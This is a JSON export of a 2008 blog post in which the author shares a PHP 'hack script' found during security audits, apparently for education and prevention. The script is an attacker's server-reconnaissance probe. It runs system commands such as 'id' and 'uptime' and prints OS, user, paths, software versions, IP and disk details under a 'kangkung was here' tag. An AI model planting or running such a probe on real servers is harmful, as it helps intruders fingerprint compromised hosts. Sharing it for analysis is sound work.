{"id":190,"date":"2008-08-15T01:31:00","date_gmt":"2008-08-15T01:31:00","guid":{"rendered":"http:\/\/blog.trungson.com\/?p=190"},"modified":"2008-08-15T01:31:00","modified_gmt":"2008-08-15T01:31:00","slug":"some-hack-script","status":"publish","type":"post","link":"http:\/\/blog.trungson.com\/?p=190","title":{"rendered":"Some Hack Script"},"content":{"rendered":"<p>After my fare share of performing security audit, these are some hacking script I found, not for the purpose of hacking, but for education, analysis and prevention.<br \/>\n<textarea name=\"code\" class=\"php\"><br \/>\nfunction ConvertBytes($number)<br \/>\n{<br \/>\n        $len = strlen($number);<br \/>\n        if($len < 4)\n        {\n                return sprintf(\"%d b\", $number);\n        }\n        if($len >= 4 &#038;&#038; $len <=6)\n        {\n                return sprintf(\"%0.2f Kb\", $number\/1024);\n        }\n        if($len >= 7 &#038;&#038; $len <=9)\n        {\n                return sprintf(\"%0.2f Mb\", $number\/1024\/1024);\n        }\n\n        return sprintf(\"%0.2f Gb\", $number\/1024\/1024\/1024);\n\n}\n\necho \"kangkung<br \/>&#8220;;<br \/>\n$un = @php_uname();<br \/>\n$up = system(uptime);<br \/>\n$id1 = system(id);<br \/>\n$pwd1 = @getcwd();<br \/>\n$sof1 = getenv(&#8220;SERVER_SOFTWARE&#8221;);<br \/>\n$php1 = phpversion();<br \/>\n$name1 = $_SERVER[&#8216;SERVER_NAME&#8217;];<br \/>\n$ip1 = gethostbyname($SERVER_ADDR);<br \/>\n$free1= diskfreespace($pwd1);<br \/>\n$free = ConvertBytes(diskfreespace($pwd1));<br \/>\nif (!$free) {$free = 0;}<br \/>\n$all1= disk_total_space($pwd1);<br \/>\n$all = ConvertBytes(disk_total_space($pwd1));<br \/>\nif (!$all) {$all = 0;}<br \/>\n$used = ConvertBytes($all1-$free1);<br \/>\n$os = @PHP_OS;<\/p>\n<p>echo &#8220;kangkung was here ..<br \/>&#8220;;<br \/>\necho &#8220;uname -a: $un<br \/>&#8220;;<br \/>\necho &#8220;os: $os<br \/>&#8220;;<br \/>\necho &#8220;uptime: $up<br \/>&#8220;;<br \/>\necho &#8220;id: $id1<br \/>&#8220;;<br \/>\necho &#8220;pwd: $pwd1<br \/>&#8220;;<br \/>\necho &#8220;php: $php1<br \/>&#8220;;<br \/>\necho &#8220;software: $sof1<br \/>&#8220;;<br \/>\necho &#8220;server-name: $name1<br \/>&#8220;;<br \/>\necho &#8220;server-ip: $ip1<br \/>&#8220;;<br \/>\necho &#8220;free: $free<br \/>&#8220;;<br \/>\necho &#8220;used: $used<br \/>&#8220;;<br \/>\necho &#8220;total: $all<br \/>&#8220;;<br \/>\nexit;<br \/>\n<\/textarea><\/p>\n","protected":false},"excerpt":{"rendered":"<p>After my fare share of performing security audit, these are some hacking script I found, not for the purpose of hacking, but for education, analysis and prevention. function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf(\"%d b\", $number); } if($len >= 4 &#038;&#038; $len = 7 &#038;&#038; $len<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[],"_links":{"self":[{"href":"http:\/\/blog.trungson.com\/index.php?rest_route=\/wp\/v2\/posts\/190"}],"collection":[{"href":"http:\/\/blog.trungson.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blog.trungson.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blog.trungson.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.trungson.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=190"}],"version-history":[{"count":0,"href":"http:\/\/blog.trungson.com\/index.php?rest_route=\/wp\/v2\/posts\/190\/revisions"}],"wp:attachment":[{"href":"http:\/\/blog.trungson.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blog.trungson.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blog.trungson.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}